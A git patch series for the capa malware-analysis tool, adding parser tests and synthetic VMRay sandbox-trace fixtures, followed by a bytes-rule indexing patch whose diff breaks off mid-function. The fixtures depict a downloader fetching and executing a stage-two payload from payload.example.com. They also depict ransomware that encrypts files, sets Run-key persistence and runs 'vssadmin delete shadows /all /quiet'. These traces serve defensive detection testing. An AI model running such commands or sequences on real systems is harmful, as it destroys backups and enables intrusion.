parametric unit tests: - _parse_hex_or_decimal: 15 valid cases + 5 invalid-raises cases - _parse_event: 7 valid formats + 8 lines that must return None - _parse_args: 8 param-name cases + 2 structural assertions New resilience tests: - garbled / truncated event lines are silently skipped (5 variants) - Process block with no Thread: block yields no processes - UTF-8 BOM prefix is accepted New round-trip test: - parse -> extract features -> verify API/String/Number feature counts --- .../vmray/flog_txt/crlf_endings.flog.txt | 29 ++ .../vmray/flog_txt/format_variance.flog.txt | 74 +++ tests/test_vmray_flog_txt.py | 434 ++++++++++++++++-- 3 files changed, 507 insertions(+), 30 deletions(-) create mode 100644 tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt create mode 100644 
tests/fixtures/vmray/flog_txt/format_variance.flog.txt diff --git a/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt new file mode 100644 index 0000000000..cf120d9e6e --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/crlf_endings.flog.txt @@ -0,0 +1,29 @@ +# Log Creation Date: 06.03.2025 09:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x0500" +os_parent_pid = "0x0004" +parent_id = "0" +image_name = "downloader.exe" +filename = "c:\users\admin\downloader.exe" +cmd_line = "downloader.exe" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x0501" + [0001.000] InternetOpenA (lpszAgent="WinInet", dwAccessType=0x0, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c0000 + [0001.001] InternetConnectA (hInternet=0x4c0000, lpszServerName="payload.example.com", nServerPort=0x50, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c0004 + [0001.002] HttpOpenRequestA (hConnect=0x4c0004, lpszVerb="GET", lpszObjectName="/stage2.bin", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c0008 + [0001.003] HttpSendRequestA (hRequest=0x4c0008, lpszHeaders=NULL, dwHeadersLength=0x0, lpOptional=NULL, dwOptionalLength=0x0) returned 0x1 + [0001.004] InternetReadFile (hFile=0x4c0008, lpBuffer=0x20000, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x30000) returned 0x1 + [0001.005] CreateFileA (lpFileName="C:\Windows\Temp\svchost32.exe", dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x60 + [0001.006] WriteFile (hFile=0x60, lpBuffer=0x20000, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x40000, lpOverlapped=NULL) returned 0x1 + [0001.007] WinExec (lpCmdLine="C:\Windows\Temp\svchost32.exe", uCmdShow=0x0) returned 0x21 
diff --git a/tests/fixtures/vmray/flog_txt/format_variance.flog.txt b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt new file mode 100644 index 0000000000..473ec0b51f --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/format_variance.flog.txt @@ -0,0 +1,74 @@ +# Log Creation Date: 05.03.2025 14:22:07 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "0001" +os_pid = "0x00000ABC" +os_parent_pid = "0x0004" +parent_id = "0000" +image_name = "ransomware.exe" +filename = "c:\\users\\victim\\desktop\\ransomware.exe" +cmd_line = "\"c:\\users\\victim\\desktop\\ransomware.exe\" --silent" +monitor_reason = "analysis_target" + +Region: +id = "0010" +name = "private_0x0000000000010000" + +Thread: +id = "0001" +os_tid = "0x00001B00" + [0001.000] GetCurrentProcess () returned 0xFFFFFFFFFFFFFFFF + [0001.001] CryptAcquireContextW (phProv=0x2000, szContainer=NULL, szProvider=NULL, dwProvType=24, dwFlags=0xF0000000) returned 1 + [0001.002] CryptGenRandom (hProv=0x2000, dwLen=16, pbBuffer=0x3000) returned 1 + [0001.003] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\important.docx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=NULL) returned 0x00000054 + [0001.004] ReadFile (hFile=0x54, lpBuffer=0x4000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x5000, lpOverlapped=NULL) returned 1 + [0001.005] WriteFile (hFile=0x54, lpBuffer=0x6000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x7000, lpOverlapped=NULL) returned 1 + [0001.006] CloseHandle (hObject=0x54) returned 1 + [0001.007] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\important.docx", lpNewFileName="C:\\Users\\victim\\Documents\\important.docx.locked", dwFlags=0x1) returned 1 + [0001.008] RegOpenKeyExW (hKey=2147483650, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0, samDesired=131097) returned 0 + [0001.009] RegSetValueExW (hKey=0x100, 
lpValueName="WindowsDefender", Reserved=0, dwType=1, lpData="C:\\Users\\victim\\Desktop\\ransomware.exe") returned 0 + [0001.010] DeleteFileW (lpFileName="C:\\Windows\\System32\\vssadmin.exe") returned 0x80070005 + [0001.011] CreateProcessW (lpApplicationName=NULL, lpCommandLine="vssadmin.exe delete shadows /all /quiet", dwCreationFlags=8, lpEnvironment=NULL, lpCurrentDirectory=NULL, lpStartupInfo=0x8000, lpProcessInformation=0x9000) returned 1 + [0001.012] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0)", dwAccessType=1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0) returned 0x4c9804 + [0001.013] InternetOpenUrlW (hInternet=0x4c9804, lpszUrl="http://ransom.example.com/key?id=ABCDEF0123456789", dwHeadersLength=0, dwFlags=0x80000000, dwContext=0) returned 0x4c9808 + [0001.014] HttpSendRequestW (hRequest=0x4c9808, lpszHeaders=NULL, dwHeadersLength=0, lpOptional=NULL, dwOptionalLength=0) returned 1 + [0001.015] CoTaskMemFree (pv=0x746aa0) + [0001.016] GetSystemInfo (lpSystemInfo=0x1000) + [0001.017] WaitForSingleObject (hHandle=0x200, dwMilliseconds=4294967295) returned 0x0 + [0001.018] ExitProcess (uExitCode=0) + +Thread: +id = "0002" +os_tid = "0x00001B01" + [0002.000] CreateFileW (lpFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", dwDesiredAccess=0xC0000000, dwShareMode=0x0, lpSecurityAttributes=NULL, dwCreationDisposition=3, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x55 + [0002.001] ReadFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x11000, lpOverlapped=NULL) returned 1 + [0002.002] CryptEncrypt (hKey=0x3000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10000, pdwDataLen=0x12000, dwBufLen=4096) returned 1 + [0002.003] WriteFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x13000, lpOverlapped=NULL) returned 1 + [0002.004] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", 
lpNewFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", dwFlags=1) returned 1 + [0002.005] FindFirstFileW (lpFileName="C:\\Users\\victim\\*", lpFindFileData=0x14000) returned 0x56 + [0002.006] FindNextFileW (hFindFile=0x56, lpFindFileData=0x14000) returned 1 + [0002.007] CreateFileW (lpFileName="C:\\Users\\victim\\README_DECRYPT.txt", dwDesiredAccess=1073741824, dwShareMode=0, lpSecurityAttributes=NULL, dwCreationDisposition=2, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x57 + [0002.008] WriteFile (hFile=0x57, lpBuffer=0x15000, nNumberOfBytesToWrite=512, lpNumberOfBytesWritten=0x16000, lpOverlapped=NULL) returned 1 + +Process: +id = "0002" +os_pid = "0x00000BCE" +os_parent_pid = "0x00000ABC" +parent_id = "0001" +image_name = "vssadmin.exe" +filename = "c:\\windows\\system32\\vssadmin.exe" +cmd_line = "vssadmin.exe delete shadows /all /quiet" +monitor_reason = "child_process" + +Region: +id = "0020" +name = "private_0x0000000000020000" + +Thread: +id = "0003" +os_tid = "0x00002C00" + [0003.000] NtQuerySystemInformation (SystemInformationClass=0x5, SystemInformation=0x20000, SystemInformationLength=0x1000, ReturnLength=0x21000) returned 0x0 + [0003.001] OpenProcess (dwDesiredAccess=0x1F0FFF, bInheritHandle=0, dwProcessId=2748) returned 0x58 + [0003.002] VssDeleteSnapshots (pwszObjectName=NULL, eSourceObjectType=0x0, bForceDelete=TRUE) returned 0x80042302 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 133d286fb5..9937703cce 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -18,10 +18,11 @@ import pytest -import capa.features.common import capa.features.insn +import capa.features.common from capa.exceptions import UnsupportedFormatError from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.flog_txt import _parse_args, _parse_event, _parse_hex_or_decimal from capa.features.extractors.vmray.extractor import VMRayExtractor # Fixture files live in 
tests/fixtures/vmray/flog_txt/ (committed to the main repo so they @@ -92,9 +93,7 @@ def test_parse_flog_txt_minimal(tmp_path): def test_parse_flog_txt_rejects_wrong_header(): - with pytest.raises( - UnsupportedFormatError, match="does not appear to be a VMRay flog.txt" - ): + with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") @@ -114,9 +113,7 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): def test_vmray_analysis_from_flog_txt(tmp_path): path = tmp_path / "flog.txt" - path.write_bytes( - MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") - ) + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) from capa.features.extractors.vmray import VMRayAnalysis analysis = VMRayAnalysis.from_flog_txt(path) @@ -132,9 +129,7 @@ def test_vmray_extractor_from_flog_txt(tmp_path): from capa.features.address import NO_ADDRESS path = tmp_path / "flog.txt" - path.write_bytes( - MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") - ) + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) ext = VMRayExtractor.from_flog_txt(path) assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt procs = list(ext.get_processes()) @@ -249,9 +244,7 @@ def test_windows_flog_txt_api_features(windows_apis_extractor): "GetAddrInfoW", "GetComputerNameW", ): - assert ( - capa.features.insn.API(api_name) in features - ), f"API({api_name!r}) not found" + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" def test_windows_flog_txt_string_args(windows_apis_extractor): @@ -280,19 +273,14 @@ def test_windows_flog_txt_string_args(windows_apis_extractor): # GetComputerNameW result (child process) "DESKTOP-TEST01", ): - assert ( - capa.features.common.String(expected_string) in features - ), 
f"String({expected_string!r}) not found" + assert capa.features.common.String(expected_string) in features, f"String({expected_string!r}) not found" def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" features = _collect_all_call_features(windows_apis_extractor) # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash - assert ( - capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") - not in features - ) + assert capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") not in features def test_windows_flog_txt_number_args(windows_apis_extractor): @@ -354,9 +342,7 @@ def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): "sendto", "recvfrom", ): - assert ( - capa.features.insn.API(stripped_name) in features - ), f"API({stripped_name!r}) not found after stripping" + assert capa.features.insn.API(stripped_name) in features, f"API({stripped_name!r}) not found after stripping" def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): @@ -387,9 +373,7 @@ def string_edge_cases_extractor(): def test_edge_case_paths_with_spaces(string_edge_cases_extractor): """File paths containing spaces are parsed correctly.""" features = _collect_all_call_features(string_edge_cases_extractor) - assert ( - capa.features.common.String("C:\\path with spaces\\file name.txt") in features - ) + assert capa.features.common.String("C:\\path with spaces\\file name.txt") in features def test_edge_case_unc_path(string_edge_cases_extractor): @@ -407,10 +391,7 @@ def test_edge_case_url_string(string_edge_cases_extractor): def test_edge_case_registry_key(string_edge_cases_extractor): """Registry key paths are normalised to single backslashes.""" features = _collect_all_call_features(string_edge_cases_extractor) - assert ( - 
capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") - in features - ) + assert capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") in features def test_edge_case_numeric_args(string_edge_cases_extractor): @@ -422,3 +403,396 @@ def test_edge_case_numeric_args(string_edge_cases_extractor): assert capa.features.insn.Number(4096) in features # WriteProcessMemory nSize=4096 assert capa.features.insn.Number(4096) in features + + +# --------------------------------------------------------------------------- +# _parse_hex_or_decimal parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "raw, expected", + [ + ("0", 0), + ("1", 1), + ("255", 255), + ("4294967295", 4294967295), + ("0x0", 0), + ("0xff", 255), + ("0xFF", 255), + ("0xDEADbeef", 0xDEADBEEF), + ("0xffffffffffffffff", 0xFFFFFFFFFFFFFFFF), + ("0x80070005", 0x80070005), + # leading/trailing whitespace is stripped + (" 0x10 ", 0x10), + # quoted values are unquoted before parsing + ('"0x20"', 0x20), + # empty string → 0 + ("", 0), + # negative decimal (Python int() accepts it) + ("-1", -1), + ], +) +def test_parse_hex_or_decimal_valid(raw, expected): + assert _parse_hex_or_decimal(raw) == expected + + +@pytest.mark.parametrize("raw", ["NULL", "TRUE", "FALSE", "INVALID_HANDLE_VALUE", "abc"]) +def test_parse_hex_or_decimal_invalid_raises(raw): + with pytest.raises((ValueError, TypeError)): + _parse_hex_or_decimal(raw) + + +# --------------------------------------------------------------------------- +# _parse_event parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "line, expected_api, expected_rv", + [ + # basic no-arg call with hex return value + ("[0072.750] GetCurrentProcess () returned 0xffffffffffffffff", "GetCurrentProcess", 0xFFFFFFFFFFFFFFFF), + # uppercase hex return value (mixed case) + ("[0001.000] 
GetCurrentProcess () returned 0xFFFFFFFF", "GetCurrentProcess", 0xFFFFFFFF), + # HRESULT-style error code + ("[0001.010] DeleteFileW () returned 0x80070005", "DeleteFileW", 0x80070005), + # no return value at all (line ends after closing paren) + ("[0083.567] CoTaskMemFree (pv=0x746aa0)", "CoTaskMemFree", None), + # decimal return value + ("[0001.003] ExitProcess (uExitCode=0) returned 0", "ExitProcess", 0), + # leading zeros in timestamp major/minor + ("[0001.000] NtCreateFile () returned 0x0", "NtCreateFile", 0), + # large timestamp + ("[9999.999] LongRunningOp () returned 0x1", "LongRunningOp", 1), + ], +) +def test_parse_event_valid(line, expected_api, expected_rv): + result = _parse_event(line) + assert result is not None + api_name, _args, rv = result + assert api_name == expected_api + assert rv == expected_rv + + +@pytest.mark.parametrize( + "line", + [ + # does not start with '[' + "GetCurrentProcess () returned 0x1", + # comment / header line + "# Flog Txt Version 1", + # blank line + "", + # property line (key = value) + 'id = "1"', + # bracket never closed + "[0001.000 GetCurrentProcess () returned 0x1", + # section header + "Process:", + "Thread:", + "Region:", + ], +) +def test_parse_event_rejects_non_event_lines(line): + assert _parse_event(line) is None + + +# --------------------------------------------------------------------------- +# _parse_args parametric tests +# --------------------------------------------------------------------------- + + +@pytest.mark.parametrize( + "args_str, expected_names", + [ + # empty / whitespace-only → None + ("", None), + (" ", None), + # only symbolic constants (NULL, TRUE) → no parseable params → None + ("lpszProxyName=NULL, lpszProxyBypass=NULL", None), + # string arg only + ('lpszAgent="WinInet"', ["lpszAgent"]), + # numeric hex arg + ("dwDesiredAccess=0x80000000", ["dwDesiredAccess"]), + # numeric decimal arg + ("dwLen=16", ["dwLen"]), + # mixed: string + hex + decimal + symbolic (symbolic skipped) + 
('lpFileName="test.exe", dwAccess=0x80000000, count=4096, hTemplate=NULL', ["lpFileName", "dwAccess", "count"]), + # mixed-case hex is accepted + ("addr=0xDEADbeef", ["addr"]), + ], +) +def test_parse_args_param_names(args_str, expected_names): + result = _parse_args(args_str) + if expected_names is None: + assert result is None + else: + assert result is not None + names = [p.name for p in result.params] + assert names == expected_names + + +def test_parse_args_string_value_stored_in_deref(): + result = _parse_args('lpFileName="hello.txt"') + assert result is not None + assert len(result.params) == 1 + p = result.params[0] + assert p.type_ == "void_ptr" + assert p.deref is not None + assert p.deref.type_ == "str" + assert p.deref.value == "hello.txt" + + +def test_parse_args_numeric_type(): + result = _parse_args("dwSize=4096, hKey=0x80000001") + assert result is not None + names = {p.name: p for p in result.params} + assert names["dwSize"].type_ == "unsigned_32bit" + assert names["dwSize"].value == "4096" + assert names["hKey"].type_ == "unsigned_32bit" + assert names["hKey"].value == "0x80000001" + + +# --------------------------------------------------------------------------- +# Malformed-input resilience tests +# --------------------------------------------------------------------------- + + +_HEADER = b"# Flog Txt Version 1\n\n" +_PROCESS_HEADER = ( + b"Process:\n" + b'id = "1"\n' + b'os_pid = "0x1000"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'image_name = "sample.exe"\n' + b'filename = "sample.exe"\n' + b'cmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' +) +_THREAD_HEADER = b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + + +@pytest.mark.parametrize( + "extra_lines", + [ + # completely garbled event lines are silently skipped + b"not a valid event line\n", + b"[broken bracket\n", + b"[0001.000 missing closing bracket] Func () returned 0x1\n", + # comment inside thread block is skipped + b"# stray comment\n [0001.000] GetCurrentProcess 
() returned 0x1\n", + # blank lines inside thread block + b"\n\n [0001.000] GetCurrentProcess () returned 0x1\n", + ], +) +def test_malformed_event_lines_do_not_crash(tmp_path, extra_lines): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + _PROCESS_HEADER + _THREAD_HEADER + extra_lines) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + + +def test_process_block_without_thread_is_skipped(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(_HEADER + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nimage_name = "x.exe"\n') + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 0 + + +def test_bom_prefix_is_accepted(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(b"\xef\xbb\xbf" + _HEADER + _PROCESS_HEADER + _THREAD_HEADER) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.monitor_processes) == 1 + + +# --------------------------------------------------------------------------- +# format_variance.flog.txt — real-world format diversity fixture +# --------------------------------------------------------------------------- +# This fixture exercises: zero-padded hex IDs, decimal-only arguments alongside +# symbolic constants, mixed-case hex return values, multiple threads in one +# process, HRESULT-style error codes as return values, and no-return-value calls. 
+ + +@pytest.fixture(scope="module") +def format_variance_extractor(): + path = FLOG_TXT_FIXTURES / "format_variance.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_format_variance_process_and_thread_count(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + assert len(procs) == 2 + thread_counts = [len(list(format_variance_extractor.get_threads(p))) for p in procs] + # first process has two threads, second has one + assert sorted(thread_counts) == [1, 2] + + +def test_format_variance_leading_zero_pid_parsed(format_variance_extractor): + procs = list(format_variance_extractor.get_processes()) + pids = {p.inner.pid for p in procs} + # os_pid = "0x00000ABC" → 0xABC = 2748 + assert 0xABC in pids + + +def test_format_variance_api_features(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for api_name in ( + "CreateFileW", + "ReadFile", + "WriteFile", + "MoveFileExW", + "RegOpenKeyExW", + "RegSetValueExW", + "CryptAcquireContextW", + "CryptGenRandom", + "CryptEncrypt", + "InternetOpenW", + "InternetOpenUrlW", + "CreateProcessW", + "FindFirstFileW", + "FindNextFileW", + "NtQuerySystemInformation", + "OpenProcess", + "CloseHandle", + "WaitForSingleObject", + "ExitProcess", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_format_variance_string_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + for expected in ( + "C:\\Users\\victim\\Documents\\important.docx", + "C:\\Users\\victim\\Documents\\important.docx.locked", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx", + "C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", + "C:\\Users\\victim\\README_DECRYPT.txt", + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "WindowsDefender", + "C:\\Users\\victim\\Desktop\\ransomware.exe", + "Mozilla/4.0 (compatible; MSIE 8.0)", + 
"http://ransom.example.com/key?id=ABCDEF0123456789", + "vssadmin.exe delete shadows /all /quiet", + ): + assert capa.features.common.String(expected) in features, f"String({expected!r}) not found" + + +def test_format_variance_decimal_only_numeric_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # RegOpenKeyExW: hKey=2147483650 (decimal), ulOptions=0, samDesired=131097 (decimal) + assert capa.features.insn.Number(2147483650) in features + assert capa.features.insn.Number(131097) in features + # CryptAcquireContextW: dwProvType=24 (decimal) + assert capa.features.insn.Number(24) in features + # WaitForSingleObject: dwMilliseconds=4294967295 (decimal INFINITE) + assert capa.features.insn.Number(4294967295) in features + + +def test_format_variance_mixed_case_hex_args(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CryptAcquireContextW dwFlags=0xF0000000 (uppercase hex digits in fixture) + assert capa.features.insn.Number(0xF0000000) in features + + +def test_format_variance_no_returnvalue_calls_parsed(format_variance_extractor): + features = _collect_all_call_features(format_variance_extractor) + # CoTaskMemFree and GetSystemInfo have no "returned" clause in the fixture + assert capa.features.insn.API("CoTaskMemFree") in features + assert capa.features.insn.API("GetSystemInfo") in features + + +def test_format_variance_child_process_present(format_variance_extractor): + features = _collect_call_features_for_process(format_variance_extractor, "vssadmin.exe") + assert capa.features.insn.API("NtQuerySystemInformation") in features + assert capa.features.insn.API("OpenProcess") in features + + +# --------------------------------------------------------------------------- +# crlf_endings.flog.txt — Windows CRLF line endings +# --------------------------------------------------------------------------- + + +@pytest.fixture(scope="module") +def crlf_extractor(): + path = 
FLOG_TXT_FIXTURES / "crlf_endings.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_crlf_process_parsed(crlf_extractor): + procs = list(crlf_extractor.get_processes()) + assert len(procs) == 1 + assert procs[0].inner.image_name == "downloader.exe" + + +def test_crlf_api_features(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + for api_name in ( + "InternetOpenA", + "InternetConnectA", + "HttpOpenRequestA", + "HttpSendRequestA", + "InternetReadFile", + "CreateFileA", + "WriteFile", + "WinExec", + ): + assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found" + + +def test_crlf_string_args(crlf_extractor): + features = _collect_all_call_features(crlf_extractor) + assert capa.features.common.String("WinInet") in features + assert capa.features.common.String("payload.example.com") in features + assert capa.features.common.String("GET") in features + assert capa.features.common.String("/stage2.bin") in features + assert capa.features.common.String("C:\\Windows\\Temp\\svchost32.exe") in features + + +# --------------------------------------------------------------------------- +# Round-trip test: parse → extract features → verify counts and spot-checks +# --------------------------------------------------------------------------- + + +def test_round_trip_feature_count(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample.exe"\nfilename = "sample.exe"\ncmd_line = ""\n' + b'monitor_reason = "analysis_target"\n\n' + b"Thread:\n" + b'id = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFileW (lpFileName="secret.txt", dwDesiredAccess=0x80000000) returned 0x4\n' + b" [0001.001] ReadFile (hFile=0x4, lpBuffer=0x5000, nNumberOfBytesToRead=512) returned 0x1\n" + b" [0001.002] CloseHandle (hObject=0x4) returned 0x1\n" + b" [0001.003] GetCurrentProcess () returned 
0xffffffffffffffff\n" + ) + ext = VMRayExtractor.from_flog_txt(path) + procs = list(ext.get_processes()) + assert len(procs) == 1 + + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 4 + + features = _collect_all_call_features(ext) + + # spot-check: API names + assert capa.features.insn.API("CreateFileW") in features + assert capa.features.insn.API("ReadFile") in features + assert capa.features.insn.API("CloseHandle") in features + assert capa.features.insn.API("GetCurrentProcess") in features + + # spot-check: string arg from CreateFileW + assert capa.features.common.String("secret.txt") in features + + # spot-check: numeric args + assert capa.features.insn.Number(0x80000000) in features + assert capa.features.insn.Number(512) in features From 0b0d1aff08ce7f0e2bfab8fc3d9c5fd7d22de6a3 Mon Sep 17 00:00:00 2001 From: devs6186 Date: Fri, 20 Mar 2026 02:50:27 +0530 Subject: [PATCH 5/7] rules: add 4-byte prefix index for bytes rule candidate selection Replace the linear scan of all bytes rules with a prefix-bucketed lookup. At index time, each bytes pattern is hashed by its first 4 bytes into a dict bucket; at match time, extracted bytes features probe only matching buckets instead of scanning every rule. Patterns shorter than 4 bytes fall back to a linear scan. Also precompute the rule topological-order index at RuleSet construction time instead of rebuilding it on every _match() call, and add a stale cache structure guard in cache.py for _RuleFeatureIndex shape changes. 
Closes #2128 --- CHANGELOG.md | 1 + capa/rules/__init__.py | 75 ++++++++++++++++++------ capa/rules/cache.py | 16 ++++- tests/test_match.py | 129 +++++++++++++++++++++++++++++++++++++++++ 4 files changed, 200 insertions(+), 21 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 636f864436..d81b20a96c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -52,6 +52,7 @@ - doc: document that default output shows top-level matches only; -v/-vv show nested matches @devs6186 #1410 - doc: fix typo in usage.md, add documentation links to README @devs6186 #2274 +- rules: pre-filter bytes rule candidates by shared 4-byte prefixes to reduce hot-path bytes scanning @devs6186 #2128 - ci: deprecate macos-13 runner and use Python v3.13 for testing @mike-hunhoff #2777 ### Raw diffs diff --git a/capa/rules/__init__.py b/capa/rules/__init__.py index da0a7d0360..e50235feb6 100644 --- a/capa/rules/__init__.py +++ b/capa/rules/__init__.py @@ -18,6 +18,7 @@ import re import copy import uuid +import struct import logging import binascii import collections @@ -56,6 +57,12 @@ logger = logging.getLogger(__name__) +# Fixed prefix size used to pre-filter extracted bytes features. +# This narrows candidate selection from all extracted bytes to those +# sharing a common 4-byte prefix while keeping the implementation simple. +# See: https://github.com/mandiant/capa/issues/2128 +_BYTES_PREFIX_SIZE = 4 + # these are the standard metadata fields, in the preferred order. # when reformatted, any custom keys will come after these. META_KEYS = ( @@ -1440,6 +1447,9 @@ def __init__( self.rules = {rule.name: rule for rule in rules} self.rules_by_namespace = index_rules_by_namespace(rules) self.rules_by_scope = {scope: self._get_rules_for_scope(rules, scope) for scope in scopes} + self._rule_indexes_by_scopes = { + scope: {rule.name: i for i, rule in enumerate(self.rules_by_scope[scope])} for scope in scopes + } # these structures are unstable and may change before the next major release. 
scores_by_rule: dict[str, int] = {} @@ -1639,8 +1649,14 @@ class _RuleFeatureIndex: # All these features will be evaluated whenever a String feature is encountered. string_rules: dict[str, list[Feature]] # Mapping from rule name to list of Bytes features that have to match. - # All these features will be evaluated whenever a Bytes feature is encountered. + # Retained for logging and existing tests; candidate selection uses the prefix structures below. bytes_rules: dict[str, list[Feature]] + # Mapping from 4-byte prefix (as big-endian uint32) to list of (rule_name, pattern) pairs. + # Built once at index time so _match() can bucket-lookup instead of scanning all bytes rules. + bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] + # Rules whose patterns are shorter than _BYTES_PREFIX_SIZE bytes. + # These cannot be bucketed by prefix and require a linear scan fallback. + bytes_short_rules: list[tuple[str, bytes]] # this routine is unstable and may change before the next major release. @staticmethod @@ -1793,6 +1809,8 @@ def and_score_key(item): # Ideally we find a way to get rid of all of these, eventually. 
string_rules: dict[str, list[Feature]] = {} bytes_rules: dict[str, list[Feature]] = {} + bytes_prefix_rules: dict[int, list[tuple[str, bytes]]] = collections.defaultdict(list) + bytes_short_rules: list[tuple[str, bytes]] = [] for rule in rules: rule_name = rule.meta["name"] @@ -1826,6 +1844,14 @@ def and_score_key(item): if bytes_features: bytes_rules[rule_name] = cast(list[Feature], bytes_features) + for bytes_feature in bytes_features: + assert isinstance(bytes_feature.value, bytes) + pattern = bytes_feature.value + if len(pattern) >= _BYTES_PREFIX_SIZE: + prefix = struct.unpack_from(">I", pattern)[0] + bytes_prefix_rules[prefix].append((rule_name, pattern)) + else: + bytes_short_rules.append((rule_name, pattern)) for feature in hashable_features: rules_by_feature[feature].add(rule_name) @@ -1839,7 +1865,9 @@ def and_score_key(item): "indexing: %d scanning string features, %d scanning bytes features", len(string_rules), len(bytes_rules) ) - return RuleSet._RuleFeatureIndex(rules_by_feature, string_rules, bytes_rules) + return RuleSet._RuleFeatureIndex( + rules_by_feature, string_rules, bytes_rules, dict(bytes_prefix_rules), bytes_short_rules + ) @staticmethod def _get_rules_for_scope(rules, scope) -> list[Rule]: @@ -1929,11 +1957,10 @@ def _match(self, scope: Scope, features: FeatureSet, addr: Address) -> tuple[Fea """ feature_index: 